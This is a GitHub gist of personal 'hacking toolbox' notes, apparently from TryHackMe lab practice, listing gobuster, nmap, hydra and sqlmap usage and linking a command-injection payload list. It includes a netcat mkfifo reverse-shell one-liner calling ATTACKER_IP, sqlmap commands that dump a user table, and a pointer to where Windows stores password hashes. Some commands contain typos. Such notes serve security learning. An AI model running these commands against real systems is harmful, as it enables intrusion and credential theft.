Skip to content

Instantly share code, notes, and snippets.

@pgjean

pgjean/Hacking toolbox.md

Last active February 28, 2026 02:57
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save pgjean/4efa01e78a3edd8e5d8996cb82a4a0b7 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save pgjean/4efa01e78a3edd8e5d8996cb82a4a0b7 to your computer and use it in GitHub Desktop.
Download ZIP
Hacking toolbox
Raw
Hacking toolbox.md

Websites like CrackStation and Hashes.com internally use massive rainbow tables to provide fast password cracking for hashes without salts. Doing a lookup in a sorted list of hashes is quicker than trying to crack the hash.

Base64 decode / encode

To decode a string echo -n 'c3RyaW5nLXRvLWJlLWRlY29kZWQ=' | base64 -d

command injection

cheat sheet: https://github.com/payload-box/command-injection-payload-list/blob/main/CHEAT_SHEET.md

CyberChef

online: https://gchq.github.io/CyberChef/ Local: https://github.com/gchq/CyberChef/releases

Gobuster

directory/file enumeration

gobuster dir -u {URL} -w directory-list-2.3-small.txt

Hashcat

example_hashes

NMAP

example with Vunerabilities scanner + output in a file

nmap -sV -sC --script vuln -oN blue.map 10.80.148.21

(https://github.com/vulnersCom/nmap-vulners)

Telnet

Windows

C:\Windows\System32\config - location where pass are stored

JS

(https://codebeautify.org/javascript-obfuscator) (https://obf-io.deobfuscate.io/)

Hydra Commands

(https://tryhackme.com/room/hydra?taskNo=2&sharerId=69435a072b464127a6b6bfb7)

Wordlists

Reverse shells

On local shells

nc -lvnp 443

On remote shells

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc ATTACKER_IP ATTACKER_PORT >/tmp/f

to see all options see

https://tryhackme.com/room/shellsoverview?taskNo=3&sharerId=69435a072b464127a6b6bfb7

SQLMap

work with querystring

  • list all database sqlmap -u http://sqlmaptesting.thm/search/cat=1 --dbs
  • list all tables from a database (ex users) sqlmap -u http://sqlmaptesting.thm/search/cat=1 -D users --tables
  • list all records from a database users from table thomas qlmap -u http://sqlmaptesting.thmsearch/cat=1 -D users -T thomas --dump

vulnerability scanner

https://tryhackme.com/room/vulnerabilityscanneroverview?taskNo=3&sharerId=69435a072b464127a6b6bfb7

OpenVAS

How to install on a mac https://medium.com/@tanveer.ahmed1188/install-configure-openvas-on-a-macbook-macos-using-docker-desktop-step-by-step-guide-1396ae394f3e

XSS testing tools

XSS Hunter Express(https://github.com/mandatoryprogrammer/xsshunter-express)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment